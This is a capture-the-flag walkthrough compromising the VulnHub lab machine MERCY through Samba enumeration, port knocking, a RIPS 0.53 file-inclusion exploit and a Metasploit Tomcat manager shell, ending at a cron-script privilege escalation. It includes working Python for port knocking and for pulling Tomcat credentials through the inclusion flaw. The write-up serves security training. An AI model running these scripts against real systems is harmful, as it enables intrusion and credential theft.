MERCY
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXAFrzbiabNbGeQK4mhe-Iqs5sReTZzuQou5AIcYmwIsSKbL6s2HMzFAUCwLLRwlW7XPdpIxpIo87tU5rs97SQytNlLHfK7nJyIduWYQzHxsA2HQbHdRRcM83ujfejWbPqQ6q3WWK6a0oF/s1600/screenshot.47.jpg)
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine MERCY.
- MERCY can be found here:
https://www.vulnhub.com/entry/digitalworldlocal-mercy,263/
- Once downloaded, extracted and imported into VirtualBox:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC5HgkqwYT41O_wHDQamS2tmToacBsXB-Ld7kUkcqZ1OjPnQgQEt9ekgCAXBAzm1I0zcB2eoN_ia-mYTfyyL2I2hHeE3H3HeQRcCGzgnHpHrhM8yvLMLf1B_QMPgihzDHHwVd4cTU71oNw/s400/screenshot.1.jpg)
2 - ENUMERATION
- Discovering MERCY's IP:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaF3sx3nrx0DfAyU2XPfEcp4gNKBTqYiQGz5T9rSXA4MPgURj8IZUEs_ery7OF-je8BrQo0cEtaKXCPqVd23VpPcHDkavDcpc4NW9K2LkJlgNHZAxOi2fov8yA_0WQK-7S850jjF862WC3/s1600/screenshot.2.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3sx4nTsXpg7M0K__Sk0rcNWMXcCpjOdZixC0ANoEbjhEpIVPgVHkM-6AtifWKwZNUFGuzlCU5Ry0hyphenhyphennNARR_Hn8exGNnvczdAdirEC9OAMAuz3ZCjO4mnemckevEukMK-Z2PLON3u7gUe/s1600/screenshot.3.jpg)
- Scanning with Nmap:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvD9KgCqSWkSYCIKAZqomx7Yn_7zvpMdwgzsEqBIY5k-SLCtlUngQ6WRk-RvioSnTBdhrifhokxX9KJd0aZCplXpsPR0jSfpZRnlxCNXfaUo1J_Js6fZSuq8ZEuBjRFGG5rOIyM5WH9F2y/s1600/screenshot.4.jpg)
- Looking closer at port 8080, Nmap identifies the HTTP service as Apache Tomcat/Coyote JSP engine 1.1:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmIkc0_ro8Z-jeFkaAQ19gRHm0NbSOMpb37dleYn_RWUdWvl_yGtE729Kj06HLbOBXfOpKXFIhRiK2ksd3lia1AikmEKQGCysJTsbChe7ZZvhEDl4hzST6Yhp2gmKn1r_UaNexAMYOof_r/s1600/screenshot.5.jpg)
- Dirbusting the web server at port 8080:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyvdK72Pwsuu856ncV0N2CPwdBy7Um0SUZGgPjy0wSpJbwfk1rjlNf22jssrevGiC2xGjSyRbPhCiHGX6C3gpLmoG5bdPRNHbFJUbjNPM7wT6JNjaXgioABeeUUmHY4zmTpF4o7OthGdzE/s1600/screenshot.9.jpg)
- This gives us some interesting paths to explore: the robots.txt file, the /tryharder/tryharder directory and the Tomcat /manager application.
- Connecting with the browser:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZkOSlpl5Rft_4zrDU9x1ApWIBob9mIdFvsRVIdxN1uL7Z8O3-sGBrvg3Y3GZ7u9YK0ZH-rXt6F1qSPPPtnFNQw6_cqQM5vkt0xPQIVJDVL7feFkDCFqRFGVDbgGKkR8cc6dq-qSYbTtJS/s1600/screenshot.6.jpg)
- Reading robots.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMh6jfJIDUOr4e0ketfTPJ4ymhQBmGQ9x51KKYpfC0EKU0DL3iLihGk2yuwBES2Tgf4C91I9YYSCZ1SiVwZytZbwmHWNwXhauP9Z9WiqMQpM8lLX_sNcutgdO5hbwDy-bD_t4UkDw_RINi/s1600/screenshot.67.jpg)
- Under /tryharder/tryharder we find a Base64-encoded string:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTQHq2a1jDWd1g-aztlgLpkl8EqkNIAy0nQGXajqQgBbeH5Xxnj2pODjYhSCeSelFFMFJNb-qt7eOQnXUUEtfI_H1yTkKoZnBYRetbfigEiVxPt1_kGlNQNSpsz1S4UAUOxAsOQO6juek0/s1600/screenshot.7.jpg)
- Decoding:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaPcDyQmut3lRMEnOjksA_N9mHA5i45LgS4ezXvHj4ntJtEruv3oKsHupzPPFEO2IklGV5kzf1jgF51S58oq8sgENw1FU9oB3MuQo9r2rkONLHnzCSVdyvJPfU5XyWTR8wFHs0Ucjt94Uv/s1600/screenshot.8.jpg)
- The decoded message hints that some user has the password "password" (literally); we note it down for later.
- Going to /manager:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmouyJAbiXS40vKWVNgvGoPrGH1uxnEUAsrNEaDd9dK2i2Oo17vQ8DL475FobWYL2BU2SmY9wHgqwAmklHsbW_Ob5KyH4O2ETAt4Wc0QEdo1ztcAcVxXF_71VrSdiKpp5vNqOz2sKHRbX7/s640/screenshot.10.jpg)
- Port 445 is open as well, so we enumerate the Samba server with enum4linux:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhKUO_BqwQbOmQSU0k1S6jsNrkRJqHAAOdKf9wIL2viiGT1TA4erVnVE1Yb2JwN5S5IxmxfwAVeQD1wpGjR-wo3mWjH5gI7WB232yJCTU2NbbIZyoZC7jSOc6c25BDgtaF5GsT40ludJO-/s1600/screenshot.11.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTeG4fq_ezCEbkCvL-jFRHAlSWywm0AMI_g1vNC8lJPcpFRQC2-1OSOsG9D0KpV3OjurvjDSZgpiVvkzL_CQkGEuqyEvJEDuTGg6IJ9qh60VlFL02s2tmQHjKUnzp1HLrp3ourb5f378YA/s1600/screenshot.12.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWV-V7xQjYuSqdoyfZ5k_jvWhy5j_vcyhdezasIyeaSHohjQHi0MOfqURfKISJwFC3k-HQTun-rnSHFR57VGb2tdmWVb3uy-TGJ5TaN_vAR9fOqD4JcFlT8B44kJpYIrHAO_3BZoqEMBPx/s1600/screenshot.13.jpg)
- So there are four local users: pleadformercy, qiu, thisisasuperduperlonguser and fluffy.
- Launching Hydra against the Samba server with a text file containing those usernames and the rockyou.txt wordlist:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHadyLaRhyYRdsTWC6c1zzzzfcWoL5tUnfarR2pslwHYrevFSnuKCNkzNR3TipjWFhQQQEiWFJMN6UP00S-VWU1xDfZjfdLqd7hXIdoLAQqDshj7hvBMoxJFiKOpwQufO2p6tmQrg5CutV/s320/screenshot.70.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtGnDfLxLDGHUhJ0Ak8L4GlXP8p7SpwL0Ks-H1kQvyHdmhae0SsQspB1nNLjUmuB3QWEnUU44fra6y6nD8tOEFeWlyY6n7UEwQbpom6er2vIpJngR3KZPBRWUNwFhNMVmaGLrV4mAseyZQ/s1600/screenshot.69.jpg)
- Connecting to the Samba server with the credentials qiu:password (the password hinted at by the Base64-decoded message):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp48fCOAQ40Xmszr87T0NUWfL6rE_oZGY5vxtIUHY7U-ANQ6a8joEnaB2-WAOzVAluyqV3y4z0OJpzNUjjddfZ51Bxf62qqHkuGaGVQ8xs639ghmU6hWnI_fPrS302SQOAZDMLU9WUNjj6/s1600/screenshot.14.jpg)
- Listing contents:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5Atfg7tT_VBpurqlKiJH7trDcN7IAhKgTHYln-iltekPUWXLsU41fpt3Ylknoi1562o1XBYRRPnuOpdQnANCoXvAW6fvxDAEIX-6SdIk2AYZ8w6HBTd3b-oWoh-DVUl1cUcaHw4iEaHp8/s1600/screenshot.15.jpg)
- Getting .bash_history:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZJT23aAOydKVOThf8WGAEGLhzh05U8PNKuu9jFnZXZUQv7WL9lGUqybVbQ3c2REXkJF35crRGrHOIXG-H3P7GIaj9plgXhjywrZrEL8gFyYl2WJW799IBDxr1pXscQ6FG-q6d4ZZPCOK-/s1600/screenshot.17.jpg)
- Going into the .private folder:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEphrnIkZDJCM7K-Hmi9ndhwqc48Uzvp1gZ3gmyzAX5go6wXz-apASEL22YSquTtpGoG84QKZjoHs2jnhmvnwegxexZKHgNVXl3SBUgfNYBB3WcxfVwwQflDY38hLNrFxCRMDZMR6piSbD/s1600/screenshot.16.jpg)
- Getting readme.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPgsHzE6A7w8TKQnmAttxo1j3YF94sjdt5tKYsG_okkxI2SFTzY9SFTuEc7-QW6TCir0PJubrujF6DWjRInBJig4ox_RaqBW5l36McXdNdfIXwx8pPXCUKIFG4VAw4QVATk2vuXUFJhBfX/s1600/screenshot.19.jpg)
- The secrets folder is empty:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlwRi5sGowZtYQWpqvihcW1hb2daLQ-DlIm9k1wMgOPN6nnV7Xc_Nm1vtCLjjYZ0rRGpflRZ_VV1m5sjH69lALcx8AM6CTpUnSxrl2p-C2MOFaogYP2H_iXo3pVbmjbK3t-AGyJhMBxIAe/s1600/screenshot.21.jpg)
- Entering the opensesame folder and downloading configprint and config:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixHJ6hV5n185jzyxKKH_8XBBVcgEQkmHBl8AXw9Dv6C-QMLNT9v7W3qRcY4acJ0zcvcrfiiWhwtsWSJD-Vf7_I3_yEKuBCsXWLGZi8-pWMZiOmX9rWAYHak1Yk26R05ldrCxv3mGt4AM2K/s1600/screenshot.20.jpg)
- Reading .bash_history:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbLf7BbQR_8tcr5UEU6Hw7Zoa89aOnYQJW_Gy9Hca9eST0omOtzc0IEnjyCOq7ZGvwexjpfJhzGeZuHB-vjL9f6jwgdei8BMLFASMShAdPsAql7iaOVE3Jn_T_1W63awRWDKFAyi9RBtZv/s1600/screenshot.22.jpg)
- Reading readme.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCZmgbD6YhFhfmfqz5_kynDABlDizj6Hi6kQybEtzuHWbs5SB9IdGBpX-tjbqX5Y7V6dAUY-vPCxuuNpYznGqhcY9DgrjZsLdb2xZzMmmhHHK9zws-rVLYiTEUWJFs6Tt0-Sg0sggKAGH0/s1600/screenshot.23.jpg)
- configprint refers repeatedly to the config file:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4oasU1rE7fUB0FCY-VLmwZchCxSXftflrdvqPwxBc77ca7jrD1afgzJPcn0Lug3elaD67dWVUWI5ct9s4iiIAqi9Uf6l6u75q5BayG-S-mtYT29OkVN7gBCOolLgcVEBkXyef1bPayhW5/s1600/screenshot.24.jpg)
- config turns out to be a knockd configuration: it describes two services that are currently filtered by the firewall, HTTP on port 80 and SSH on port 22, together with the port sequences that open them:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrWIhDHd07SiPcxiK3ipFaRyLL3q60i0W38onL2aWy8PqUXLKMZUH1G_zxW-N0hjrv07fiyESrKbCrhNFBa7JBNDrpseaEa6NhcoQt_g0F6kQtA5U-cJ6PUsuE6fO8dLe9qI05gC9DPYz_/s1600/screenshot.25.jpg)
- Nmap confirms that both 22 and 80 are reported as filtered:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIUCL-ksz-qdoyK3Ei3kC6ziVU4Lr4Muu77rK5iZVefXAwoNTp3Q5wfDAwkPSGwxWTe_M4WNd2G_6Jq4EvCV1C9I-lR18hX7pyV3v9CXqKehjijn8M3WTJncrVgtJamlZqDiszsYspY_41/s1600/screenshot.71.jpg)
- Since the config file quotes a distinct port sequence for each service, this is port knocking: sending connection attempts to those ports in the right order makes knockd open the firewall for the corresponding service. Knocking with the HTTP sequence first (if the port shows up as filtered again later, knockd has closed it and the knock simply needs to be repeated):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbyBeYs1-zs4pARJ4Zw-jipaWRtpzX-IQSrBtE-4V_cPUdQHAVGNEbzAr8V-yCg0966PzQqrjBdquxyXSAdrubB6yVqBDxaZk3ilcRKEa0yUqXUGLcA1C2YJ2vU0MlzdZYMqy4OWjbPEc_/s1600/screenshot.27.jpg)
- Same thing for SSH port 22:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEewXM6gjqK2og3r5aXmJq22PF1eZQB4KXn1vWf7a-yT7VeN14gQQJWUDFimxw0T4ZDJ9ZaadJbapo4l8K4es0QbbfI_rhjBJSsYNGBq9bAco2dFaK82Gy7Akih7htoghy2pDk4emrN3PO/s1600/screenshot.72.jpg)
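The knocking step above, written out as a small Python helper. This is an added example and not code from the write-up: the target address and both port sequences are placeholders, and on MERCY the real sequences are the ones quoted in the config file pulled from the Samba share.

```python
"""Port-knocking helper (added example, not part of the original write-up).

knockd watches for TCP SYNs arriving at a fixed sequence of ports and, once it
has seen the whole sequence in order, runs a command (normally an iptables rule)
that opens the protected service. A plain connect() attempt is enough to send
the SYN; the connection itself is expected to be refused or to time out.
"""
import socket
import time
from typing import Callable, Iterable, List

TARGET = "192.168.56.101"            # assumption: the lab address of MERCY
HTTP_SEQUENCE = [1111, 2222, 3333]   # placeholder, NOT the real sequence
SSH_SEQUENCE = [4444, 5555, 6666]    # placeholder, NOT the real sequence


def tcp_touch(host: str, port: int, timeout: float = 0.5) -> None:
    """Send one SYN to host:port by attempting a connect; any failure is fine."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
    except OSError:
        pass            # refused / timed out: knockd has already seen the SYN
    finally:
        sock.close()


def knock(host: str, sequence: Iterable[int], delay: float = 0.2,
          touch: Callable[[str, int], None] = tcp_touch) -> List[int]:
    """Hit every port of the sequence in order, pausing between knocks so the
    server registers them as separate events. Returns the ports knocked."""
    knocked: List[int] = []
    for port in sequence:
        touch(host, port)
        knocked.append(port)
        if delay:
            time.sleep(delay)
    return knocked


def is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """True when a full TCP handshake to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    for name, seq, port in (("HTTP", HTTP_SEQUENCE, 80), ("SSH", SSH_SEQUENCE, 22)):
        knock(TARGET, seq)
        print(f"{name}: knocked {seq}, port {port} open: {is_open(TARGET, port)}")
```

The knock client used in the screenshots does the same thing from the shell (`knock <host> <port1> <port2> <port3>`); the script only adds the check that the service actually came up afterwards, which is what tells you whether the sequence was right.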
- Port 80 now answers in the browser:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivlYEaxr7jfn7ca4RUP_j2hoZT7pu7jZkwNy8n3Hu79Qj_ZBHRbnjOiNC2RN_hIPIP8m4Mrff-_uIfx18RbSBGVndT1aAttgKMqCoMMJu5N7qSxna2JoC6TFBLe8c5kF5RmO0vU52YQAeT/s1600/screenshot.28.jpg)
- Dirbusting port 80:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGB_lhsz6RhzJNlSkuK7GgJqtffDDT7sT-04gvoNAFOo5ManKqn-qAgeZ54Fh4E8zZEFTwWdJE2G5GrlD10KTQZiUh1tWtMcAR_wE4PuSfhLLCYv9tQ6aKhwarOPsZoK06NHrs8DU8XZFs/s1600/screenshot.29.jpg)
- Reading robots.txt we discover two additional directories, /mercy and /nomercy:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5katDLGk9FDwIvBLxbRzBjPL6H0qKKiPeSzxeZn8mkDB_KFvtYxtFMHahuRQEAFotMm7Hmy9HxwI2W9qIYgqunV0BUulqbi3bLgDf_k3hklMoq3p2_zFbGXXk4_PzsltdAqLcUaI95dEp/s1600/screenshot.30.jpg)
- Going to /mercy:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj75Mrt1O7fHjuAdJdwSq5LauN5aqnZrD_HnNxF67OaB13xdrtfHRkFHeN2-KroEnmP9xeLfrucXM40ypMpUWrjEi42r9i7uB0LjgVy45c8zkfSODBksVggKxF9qIa9T8q35MagADsVgrj5/s640/screenshot.31.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3SBu_z89a976BrZ4W-g3MZgBOS7Mfl34HnpcZRbJiw3QYKTjVfdvjUAj772Q0Ir8e5dlfQz387Mp6rND0x2mtHVMOV8bc_VrZbSbCzjJtBTslEf9S2K8pcQtSB049KzEgJnyphAp9RkLx/s1600/screenshot.32.jpg)
- /nomercy hosts an instance of RIPS 0.53, a PHP static code analyser:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij8oR29d-z-mXin69y4v7CpF40jw6qs0m63xuAM2o_LFv5QBq-mNsjxQiM13uWKxz1DYwuH1z3rhvz5W0gSx5iUm48CBjTKhj9tbY-zs4xchfPD0WOdkWNGGjI2XPXu6rKsSwQA7Xe-EmD/s1600/screenshot.33.jpg)
3 - EXPLOITATION
- Searching for RIPS exploits with searchsploit turns up Exploit-DB entry 18660, "RIPS 0.53 Multiple Local File Inclusion":
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgewSB4u0WzuHFDFqtogeWWMa2QFilv5V0rhefnuYU7F-fD-p-oFr_igKHFNLeFGA_RxFUoQoU-36Ylhfbcou_YnjhZssrJT7VKYahBP-at5Awz0WgkAXeYxinOajXRN9t2g-07yahvs0b5/s1600/screenshot.34.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5DImFcKEsxryMdkrRE3PXXc-4q-EEkJg2UDOjaB-lqvVQ8dDJi__EoJJJaXcnmJPsEExB8oqZeD-WUQXEmjaQ3BMWX1aKlltKDLLanRU5_9Lo67LS_b9iqbl7DfqWWX4sAr7la-T6hw1V/s1600/screenshot.35.jpg)
- Reading 18660.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfPwedd1wW-0YftASfZ7cCDAR6J9_bUDNoccpRqXoKc1q-sjairLMDN8Uu_ex-uzpIg-XrB7zauKKLLPqyP2uM9-xyAmrLTf9AR3djQGwiqtAyjSuqyGX1Uzgk32q3GNKLnpq_ybDzvyJh/s640/screenshot.36.jpg)
- Using the LFI to read /etc/passwd:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgasvNFEpv_IQRDqBSgoartacgCvHCN-Nwx8FmeH1d2xb6ULGNtsIPSBjgCQSlFuclE4oO6m5wLbQ2RxNRV2mSrtOymRDSMPv6M3510Azyt7OPupHEWOGnr6Ipb8u58V-wGayBH5yc85o1V/s1600/screenshot.37.jpg)
- /etc/shadow cannot be read the same way, because the include runs as the web server user and /etc/shadow is only readable by root and the shadow group:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqeUpr7ftrGGjhBIz70dE3g3XAl9QnbXiOKYt88uJ5KhdExiKVaFar2an0Fz9hq7U8y25Qk9xUJH3aGO5kEy1U_xSH4Gl07UEZAkV168P8sfn4xXLNb2kq5dO5S9QG1VefcuGIPHKQeBES/s1600/screenshot.38.jpg)
- Tomcat keeps the manager application's credentials in tomcat-users.xml, which is world-readable on a default install, so that is the next file to pull through the LFI:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCBKH3-5A9UUeCaO8YJaBlq_pZt2cW994QajyX4yO3A1tJ-HfurKfhPN6_ze0oLOB7lpuDO0k0TLT9BZF7i4Zf4Nfz0mV6gRq2sTsQq0PhE0FgJszcipxfKgWaU42bHrEyttqCRPbIe1Ud/s1600/screenshot.39.jpg)
- Extracting tomcat-users.xml:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6ceR0t9a3R42SW1wM23DqeiFHvbTfnaZPPsrsLFerHkeFMu23wa5MYpflsc-Zh2CDzbhuxP_EJm27mjFYypHxGVnRwKzzc6ZtUwtiw35LwLPXkDgB8yb4jJi6-8j-KDHIUlMTxsr3mClF/s1600/screenshot.40.jpg)
- The last lines give invaluable information: two users with their corresponding passwords:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX1C-5NeO4n8SQ2l3XgWxGRw8S1SOBWzuDazAF-d5NCQ8YeNz75LYEPmGQclZy4DytL3K9y5p2-GgulsX3W0KrR3DPnFhQL4vDhxvh-fjwVdR0Jt3agnzZ0wso1MSB41DUkjh-WynAAKfm/s1600/screenshot.41.jpg)
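The two steps above (reading files through the RIPS LFI, then picking the manager accounts out of tomcat-users.xml) as one Python helper. This is an added example, not the write-up's code or the Exploit-DB entry's text. It assumes the vulnerable endpoint is `windows/code.php` with a `file` parameter, as described in the 18660 advisory, and that tomcat-users.xml sits at `/etc/tomcat7/tomcat-users.xml`; both should be checked against the advisory and the screenshots. The XML samples at the bottom are constructed test data, not the file from MERCY.

```python
"""Pull files through the RIPS 0.53 LFI and extract Tomcat manager credentials.
Added example, not the original write-up's code. Assumptions: LFI endpoint
windows/code.php?file=..., tomcat-users.xml at /etc/tomcat7/tomcat-users.xml."""
import html
import re
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET
from typing import Callable, Dict, List

BASE_URL = "http://192.168.56.101/nomercy"        # assumption: lab address of MERCY
LFI_ENDPOINT = "windows/code.php"                  # assumption (EDB-18660)
TOMCAT_USERS = "/etc/tomcat7/tomcat-users.xml"     # assumption: Tomcat 7 package layout
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}


def lfi_url(base: str, endpoint: str, path: str, depth: int = 8) -> str:
    """Traversal URL: climb `depth` directories, then descend to the target."""
    traversal = "../" * depth + path.lstrip("/")
    return f"{base.rstrip('/')}/{endpoint}?file={urllib.parse.quote(traversal, safe='/')}"


def http_get(url: str, timeout: float = 10.0) -> str:
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def lfi_read(path: str, fetch: Callable[[str], str] = http_get,
             base: str = BASE_URL, endpoint: str = LFI_ENDPOINT) -> str:
    """Fetch one file through the LFI; `fetch` is injectable for offline use."""
    return fetch(lfi_url(base, endpoint, path))


def extract_xml(body: str) -> str:
    """Cut the tomcat-users document out of the surrounding HTML. The page may
    echo the file raw or as syntax-highlighted HTML (entities, <br />, &nbsp;);
    the second form is stripped of tags and unescaped before matching."""
    pattern = re.compile(r"<tomcat-users.*?</tomcat-users>", re.S)
    match = pattern.search(body)
    if not match:
        plain = html.unescape(re.sub(r"<[^>]+>", "", body)).replace("\xa0", " ")
        match = pattern.search(plain)
    if not match:
        raise ValueError("no <tomcat-users> element found in response")
    return match.group(0)


def manager_accounts(xml_text: str) -> Dict[str, List[str]]:
    """username -> [password, role, ...] for accounts holding a manager/admin
    role. XML comments (the stock file is full of commented-out examples) are
    dropped by the parser, so only live accounts come back; the default
    namespace used by newer tomcat-users.xml files is tolerated."""
    root = ET.fromstring(xml_text)
    found: Dict[str, List[str]] = {}
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = el.get("username") or el.get("name")
        roles = [r.strip() for r in (el.get("roles") or "").split(",") if r.strip()]
        if name and MANAGER_ROLES & set(roles):
            found[name] = [el.get("password", "")] + roles
    return found


# Constructed samples (not MERCY's real file): raw echo and highlighted echo.
SAMPLE_RAW = """<html><body>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
<!-- <user username="tomcat" password="s3cret" roles="manager-gui"/> -->
<role rolename="manager-gui"/>
<user username="deployer" password="d3ploy-placeholder" roles="manager-gui,admin-gui"/>
<user username="guest" password="guest" roles="tomcat"/>
</tomcat-users>
</body></html>"""
SAMPLE_HIGHLIGHTED = (
    '<code><span style="color: #000000">&lt;tomcat-users&gt;<br />'
    '&nbsp;&nbsp;&lt;user&nbsp;username="ops"&nbsp;password="Pl4ceholder!"'
    '&nbsp;roles="manager-script"/&gt;<br />&lt;/tomcat-users&gt;</span></code>'
)

if __name__ == "__main__":
    print(manager_accounts(extract_xml(lfi_read(TOMCAT_USERS))))
```

Only accounts that carry a manager or admin role are reported, because those are the ones that let you deploy a WAR through /manager; a user that merely appears in the file is not enough for that step.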
4 - GETTING A SHELL WITH METASPLOIT
- Launching Metasploit:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjR0PAYA53otu2HyI4pgRHHyDdt1GDDTClns2GbvdHF5vBJicjsd03y9-Isj7xR9IjO0sr9-Rt9mngqG6oa9KH9u6fOkKjQQPT2OxKpTBh1UCq8u30jD_NRqTMqBAJrh4bTIGcN6xJlYvx4/s1600/screenshot.42.jpg)
- Using the Metasploit exploit for the Tomcat manager application, fed with the credentials recovered from tomcat-users.xml:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUYHL10JXrxNIHcE9wee86kbkv7CO7Smce0NDD7hgXQ-185UwEmdUysLIaBtjVbPxQF5CUeLx1uIHNlPmWaHJ9EmUX3s5jlRKtKEj7gw33_S87o8EYs-uPeGcnNJbrFyNWlBIvIz1MjIh1/s1600/screenshot.43.jpg)
- Setting options and running the exploit we get a Meterpreter session:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEc4zwsd9jHPzROyLbf8Dw2XPnYJVHqgfB6pptyaUhVNesN7vlhq0U6709WV6KJKZwImtCbr61jG4k4zUCUJ2WEMLuUHpre9Jm6wGwW5dKuCEA0ugqPFzhwrAOKggJ5MjT110RlrKngZOQ/s1600/screenshot.44.jpg)
- Spawning a shell from Meterpreter and upgrading it to a proper TTY:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiODZp8d8jRIB7zt5D71YrjyG_lyJFK-gmCTggjf2qGUux9gE1l63jkghPZfEtR8optimAv4soJJu63p-12ASOQVAEjH1oTK_2rCxFi312w206jIuoj39CYBuh_vb_Pr-3kqDB0sXR1jxdT/s1600/screenshot.45.jpg)
5 - PRIVILEGE ESCALATION
- Switching user with su, using the credentials fluffy:freakishfluffybunny recovered earlier:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8VhynPtULOhx2VRAC8mKY8OUVIv0m1VnVqk6RrhgD2O7nSlMlkpd9xZgAVaPriwfBWt1DO3VsEXAP5o9lP44URHzJj7vhVrF5dXU5HRa1W5czLNYHphU9jUhbyuELExMOMJ4KZxLPXbw_/s1600/screenshot.48.jpg)
- Unfortunately fluffy has no sudo rights:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZHrUdRINE9MWcwJvV06TihnOYfyONUMQEoK5tqIAfV84DN_eXTXuX3S2zI_UJJRqb11Rk_SBH_A_g94gR4KqSDx19FRWdaoSPfGVmwKHm0dgsn1uijNK5BGrUtCEZQCryiAoVqN-W3kyP/s1600/screenshot.66.jpg)
- Upgrading fluffy's shell to a proper TTY:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm-vFm6uiJ8qeKztY1oR5x4MLJazwsTsysIUbqwqueLK1nvr4py1irY_ieC4-ziymNPPN7RJKgFRLMloaCnmuTwpOUdigkxAyxDSVj6NqrEN8v5Z9EuuBkWsklh5gRto-40Np-P8wJhdmU/s1600/screenshot.50.jpg)
- Browsing the home directories and their files until something useful turns up:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiprg9ZQW7zy4aSJwXXgP_mGcQHo5drGQBowFtSYMR9UjE6kbq-gEaQYk96jK_1ws6P0PgxMmhIHE0PdKmLc91inh03zHnFtdHOzkZMVjUmgcGSv98TgQ206tJWPjZxAbuqyAQfdm6xpMdr/s1600/screenshot.51.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjFwcnMzeTJlg0VzntZ_iqDd1LmSPPtpy3_iaJyWzzQl5f7942eb-gU4T3_HHXZN7krskYpiTzIRMk-dbNB5gNfiCwGKkywNpxlwktKE03hsRGNOOndd0f-y14-X82Rt10CMAKoMVCiKSq/s1600/screenshot.52.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC58MNbEYxZ05OUFvvqAGUfX0x-wUcs12Jv51gfxesWFkVESVSZyA1gBnYdwj88fLtF68coH9RaS9kjX6Og-uCe5YvcdYAs8y2H81yQmINZGr2zqfucMv-GqMLiGlXMtCpdELzqbuhmhlg/s1600/screenshot.53.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZsOT4JPJfzxEBIJho7yC7dLOUhZPV6FselVYK444V7aN_ghglkzAix8V2Joy5zY-Si-66E8iYkVND32RapWeVdv5RPsHy3XfnsFT-Q4PoHJDnhlcJyzTSjkSu_iGn07VMPYPoygvjZBHG/s1600/screenshot.54.jpg)
- Finally, timeclock looks interesting: it is a root-owned script that fluffy can nevertheless write to, and its name suggests it is run periodically as root (by cron), so anything appended to it will execute with root privileges:
